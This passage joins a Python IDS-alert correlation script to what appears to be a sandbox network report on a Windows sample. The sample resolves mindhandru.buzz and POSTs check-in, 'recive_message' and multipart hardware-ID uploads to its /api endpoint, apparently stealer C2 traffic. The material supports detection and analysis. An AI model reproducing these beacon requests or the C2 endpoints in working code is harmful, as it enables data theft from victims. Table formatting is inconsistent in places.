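def parse_alerts(text: str) -> list:
    """One dict per alert row; the timestamp keeps its +0100 offset."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = [f.strip() for f in line.split("|")]
        alerts.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                       "sid": int(sid), "sig": sig, "sev": int(sev),
                       "src": src, "sport": int(sport), "dst": dst,
                       "dport": int(dport), "proto": proto})
    return alerts


def flow_key(a: dict) -> tuple:
    return (a["src"], a["sport"], a["dst"], a["dport"], a["proto"])


def is_confirmed_malware(a: dict) -> bool:
    # Assumption: a severity-1 rule in the MALWARE class is a content match, not a fingerprint.
    return a["sev"] == 1 and "MALWARE" in a["sig"]


def correlate(alerts: list) -> dict:
    """Group alerts by 5-tuple and grade each flow: escalate / watch / ignore."""
    flows = defaultdict(list)
    for a in alerts:
        flows[flow_key(a)].append(a)
    verdicts = {}
    for key, evs in flows.items():
        evs.sort(key=lambda a: a["ts"])              # stable: ties keep table order
        ja3_hit = any("JA3" in a["sig"] for a in evs)
        confirmed = [a for a in evs if is_confirmed_malware(a)]
        verdict = "escalate" if confirmed else ("watch" if ja3_hit else "ignore")
        verdicts[key] = {"verdict": verdict,
                         "sids": [a["sid"] for a in evs],
                         "first_seen": evs[0]["ts"], "last_seen": evs[-1]["ts"]}
    return verdicts


def c2_hosts(alerts: list) -> set:
    """Destination IPs that received at least one confirmed-malware alert."""
    return {a["dst"] for a in alerts if is_confirmed_malware(a)}


if __name__ == "__main__":
    parsed = parse_alerts(ALERTS)
    for key, v in correlate(parsed).items():
        print(f"{key[1]:>5} -> {key[2]:15} {v['verdict']:8} sids={v['sids']}")
    print("C2 hosts:", sorted(c2_hosts(parsed)))
```

The same grouping applied to a live EVE JSON feed (key on `src_ip`, `src_port`, `dest_ip`, `dest_port`, `proto`) keeps the JA3 rule's fingerprint-only matches out of the escalation queue while still surfacing both C2 hosts (172.67.165.185 and 104.21.11.101) from the confirmed flows.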
Timestamp                          | Source Port | Dest Port | Source IP      | Dest IP
Dec 27, 2024 08:41:48.016693115 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:48.016746044 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:48.016891003 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:48.020178080 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:48.020195961 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:49.256022930 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:49.256103992 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:49.275922060 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:49.275949955 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:49.276281118 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:49.331265926 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:49.333623886 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:49.333653927 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:49.333786964 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:49.994230986 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:49.994319916 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:49.994410038 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:49.996479988 CET | 49712       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:49.996500969 CET | 443         | 49712     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:50.005513906 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:50.005548000 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:50.005649090 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:50.005924940 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:50.005935907 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:51.309353113 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:51.309576035 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:51.410651922 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:51.410669088 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:51.411000013 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:51.412206888 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:51.412230015 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:51.412276983 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.092274904 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.092310905 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.092354059 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.092387915 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.092380047 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.092407942 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.092427969 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.092463970 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.092531919 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.092549086 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.100547075 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.100619078 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.100626945 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.108923912 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.109041929 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.109051943 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.159367085 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.211632967 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.253169060 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.253184080 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.300071955 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.302581072 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.306350946 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.306421041 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.306428909 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.306453943 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.306512117 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.306627035 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.306643009 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.306655884 CET | 49718       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.306660891 CET | 443         | 49718     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.487669945 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.487704992 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:52.487771988 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.488121033 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:52.488135099 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:53.793948889 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:53.794022083 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:53.795618057 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:53.795625925 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:53.795936108 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:53.797108889 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:53.797257900 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:53.797286987 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:54.651523113 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:54.651619911 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:54.651704073 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:54.652848959 CET | 49724       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:54.652858973 CET | 443         | 49724     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:54.797808886 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:54.797837019 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:54.797957897 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:54.798233986 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:54.798248053 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:56.055927038 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:56.056066990 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:56.057389021 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:56.057396889 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:56.057647943 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:56.058792114 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:56.058897018 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:56.058932066 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:41:56.058999062 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
Dec 27, 2024 08:41:56.099339962 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:42:04.224590063 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:42:04.224680901 CET | 443         | 49730     | 172.67.165.185 | 192.168.2.9
Dec 27, 2024 08:42:04.224790096 CET | 49730       | 443       | 192.168.2.9    | 172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.224879026 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.224899054 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:04.501157999 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.501194000 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:04.501287937 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.501656055 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.501667976 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.806520939 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.806653976 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.821322918 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.821341991 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.821774006 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.830357075 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.834202051 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.834254026 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.836311102 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.836322069 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:06.803530931 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:06.803630114 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:06.803682089 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:06.803812981 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:06.803824902 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:07.183773041 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:07.183809042 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:07.183912039 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:07.184220076 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:07.184235096 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:08.404823065 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:08.405021906 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:08.406277895 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:08.406290054 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:08.406522036 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:08.407799006 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:08.407891035 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:08.407898903 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.163161039 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.163259029 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.163331032 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:09.174583912 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:09.174607038 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.812335968 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:09.812386990 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.812484980 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:09.812946081 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:09.812958956 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.074026108 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.074170113 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.075985909 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.075994015 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.076328993 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.078022003 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.078941107 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.078974009 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079063892 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079094887 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079195023 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079236031 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079344034 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079360008 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079484940 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079510927 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079637051 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079668045 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.127331972 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.127470970 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.127521038 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.175333977 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.175549984 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.175595045 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.175609112 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.219338894 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.219520092 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.219562054 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.267332077 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.267560959 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.311327934 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.319086075 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.319173098 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.319215059 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.319264889 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.897113085 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.897351980 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.897418022 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.907864094 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.907885075 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.919967890 CET49776443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.920001984 CET44349776104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.920072079 CET49776443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.920525074 CET49776443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.920541048 CET44349776104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:15.831456900 CET49776443192.168.2.9104.21.11.101
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:41:47.872272015 CET | 56568 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 08:41:48.010066032 CET | 53 | 56568 | 1.1.1.1 | 192.168.2.9
Dec 27, 2024 08:42:09.673590899 CET | 51847 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 08:42:09.811343908 CET | 53 | 51847 | 1.1.1.1 | 192.168.2.9

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 08:41:47.872272015 CET | 192.168.2.9 | 1.1.1.1 | 0x8e2f | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:42:09.673590899 CET | 192.168.2.9 | 1.1.1.1 | 0x671a | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 08:41:44.388967037 CET | 1.1.1.1 | 192.168.2.9 | 0x6b78 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 08:41:44.388967037 CET | 1.1.1.1 | 192.168.2.9 | 0x6b78 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:41:48.010066032 CET | 1.1.1.1 | 192.168.2.9 | 0x8e2f | No error (0) | mindhandru.buzz | | 172.67.165.185 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:41:48.010066032 CET | 1.1.1.1 | 192.168.2.9 | 0x8e2f | No error (0) | mindhandru.buzz | | 104.21.11.101 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:42:09.811343908 CET | 1.1.1.1 | 192.168.2.9 | 0x671a | No error (0) | mindhandru.buzz | | 104.21.11.101 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:42:09.811343908 CET | 1.1.1.1 | 192.168.2.9 | 0x671a | No error (0) | mindhandru.buzz | | 172.67.165.185 | A (IP address) | IN (0x0001) | false
                                                                                                                                  • mindhandru.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49712 | 172.67.165.185 | 443 | 6492 | C:\Users\user\Desktop\zi042476Iv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:41:49 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 8
                                                                                                                                  Host: mindhandru.buzz
2024-12-27 07:41:49 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-27 07:41:49 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 27 Dec 2024 07:41:49 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=ikua07r1skpnvhvsjcto7afdrt; expires=Tue, 22 Apr 2025 01:28:28 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gi0zpP%2Bla%2B8lIk1lvOS7QgtMBd5BnfPjDd5G5sHRIBhUgTebbsVqGwS0bJcZBZpE8%2BPiYEjSl4RB2KfP2IkPWjTSAibxD%2BeVYcLd9EzZo%2BBuJCeJBbAqrDtsJnOIinIK%2FBk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f87aba08d67727b-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1593886&cwnd=232&unsent_bytes=0&cid=a688892fbb2a2718&ts=750&x=0"
2024-12-27 07:41:49 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-27 07:41:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49718 | 172.67.165.185 | 443 | 6492 | C:\Users\user\Desktop\zi042476Iv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:41:51 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 53
                                                                                                                                  Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:41:51 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-27 07:41:52 UTC | 1125 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:41:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=nos2supr0khn3kd05du0a99qen; expires=Tue, 22 Apr 2025 01:28:30 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ccKzlw0iGZz0zHnh5e%2BeCMmneRx0K3CwBPKNs1A0ypunm2Dx4Ibw5EyTXxIUV5n5hxtDMyZXPf8tzBhy%2FosVQNC8URpn%2FKalXNL9Fu21lgl6xBkH86E72b1Emnzzgcc%2FWk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87abad7e8341e3-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1695&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1722713&cwnd=218&unsent_bytes=0&cid=f4022f57c8a861f9&ts=788&x=0"


Session ID: 2
Source IP: 192.168.2.9
Source Port: 49724
Destination IP: 172.67.165.185
Destination Port: 443
PID: 6492
Process: C:\Users\user\Desktop\zi042476Iv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:41:53 UTC | 282 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=3RZK0SB31R8T983C3ZH
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12857
    Host: mindhandru.buzz
2024-12-27 07:41:53 UTC | 12857 | OUT | multipart body (the report captures only the first bytes):
    --3RZK0SB31R8T983C3ZH
    Content-Disposition: form-data; name="hwid"

    9D4D2C402283055CBEBA0C6A975F1733
    --3RZK0SB31R8T983C3ZH
    Content-Disposition: form-data; name="pid"

    2
    --3RZK0SB31R8T983C3ZH
    Content-Disposition: form-data; name="lid"

    LOGS11--Li
2024-12-27 07:41:54 UTC | 1130 | IN | HTTP/1.1 200 OK
